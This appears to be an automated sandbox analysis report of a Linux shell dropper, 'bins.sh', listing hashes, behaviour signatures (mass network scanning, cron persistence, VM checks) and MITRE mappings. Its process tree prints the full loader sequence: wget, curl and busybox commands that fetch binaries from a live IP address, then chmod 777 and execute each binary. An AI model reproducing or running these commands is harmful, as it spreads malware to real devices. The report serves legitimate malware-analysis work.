Analysis
-
max time kernel
149s -
max time network
162s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 19:52
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3ddeda65fdff7dc7e3cc275ff6f553d3
-
SHA1
63ea40bbcbb7ae0a7d338ea6283460d48c3f6368
-
SHA256
67db0a782044ee286667c282875397514a893b73eb8b8102d5401e5841d123af
-
SHA512
b1a6e4dbb31b142cac5c142a8adafdb6e53106d788ce26f3e40d930a821147cc6dc5289ecc3217d1b7545ab6d69bd3c12c3128a980d76ac3986a334f102c3a0e
-
SSDEEP
96:Bj2IPO3r7edhO9HzMJQIDCuBlVArHZro/T8jAIC+r7edh4VLIlVArHZfDzMlPQIz:Bj2IPOd92QIDCuBsKQIDCuv
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1837) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid Process 727 chmod 764 chmod 784 chmod 698 chmod -
Executes dropped EXE 4 IoCs
Processes:
kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQOgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQioc pid Process /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO 699 kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ 729 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ /tmp/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5 766 OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5 /tmp/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ 785 oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ -
Renames itself 1 IoCs
Processes:
oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQpid Process 786 oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.rgnCyd crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQcurlcurldescription ioc Process File opened for reading /proc/898/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/994/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/23/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/831/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/857/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/897/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/900/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/937/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/24/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/41/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/781/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/828/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/854/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/885/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/975/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/self/auxv curl File opened for reading /proc/145/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/824/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/837/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/880/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/111/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/271/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/810/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/1003/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/829/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/836/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/597/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/841/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/903/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/858/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/905/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/920/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/999/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/1007/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/806/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/812/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/922/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/940/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/13/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/16/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/142/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/978/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/114/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/947/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/1002/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/793/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/838/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/851/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/861/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/945/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/21/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/653/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/820/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/873/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/815/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/867/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/1000/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/816/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/863/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/1001/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/869/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ File opened for reading /proc/902/cmdline oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetwgetcurlwgetcurlwgetcurlcurlbusyboxbusyboxbusyboxdescription ioc Process File opened for modification /tmp/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5 busybox File opened for modification /tmp/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ wget File opened for modification /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO wget File opened for modification /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO curl File opened for modification /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ wget File opened for modification /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ curl File opened for modification /tmp/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5 wget File opened for modification /tmp/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5 curl File opened for modification /tmp/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ curl File opened for modification /tmp/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ busybox File opened for modification /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO busybox File opened for modification /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:654
-
/bin/rm/bin/rm bins.sh2⤵PID:657
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- Writes file to tmp directory
PID:661
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:678
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- Writes file to tmp directory
PID:684
-
-
/bin/chmodchmod 777 kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO./kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- Writes file to tmp directory
PID:703
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- Writes file to tmp directory
PID:722
-
-
/bin/chmodchmod 777 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ./60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵
- Writes file to tmp directory
PID:734
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵
- Writes file to tmp directory
PID:747
-
-
/bin/chmodchmod 777 OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH5./OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ2⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ2⤵
- Writes file to tmp directory
PID:783
-
-
/bin/chmodchmod 777 oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ./oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:785 -
/bin/shsh -c "crontab -l"3⤵PID:787
-
/usr/bin/crontabcrontab -l4⤵PID:788
-
-
-
/bin/shsh -c "crontab -"3⤵PID:789
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:790
-
-
-
-
/bin/rmrm oTwyc0G50fGYWVNInaXL7QD0ZLD1ughZtQ2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bQWu8dXtnUrl0nBKlkBRPQgu1vZwPOBZkB2⤵PID:795
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
111KB
MD5ca897a38f23ec23521ce0b1b83f8422d
SHA1b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
SHA256043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
SHA51210d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD52279ac2a7970aa96657dfd80d43ab370
SHA1478dca26653fbc606bcaa7704f94da75e280f17c
SHA25658f02ac36630580ba15148e032abec8f769bafa6cb5109f0098bf6940b408264
SHA512f25dca3231d81e2a10166fef7f3fb6b79dcc49934014c807636c2da2634fb8946740812e7fc65cac3205a549027f548b195944aab11047590e541ae82716e2d7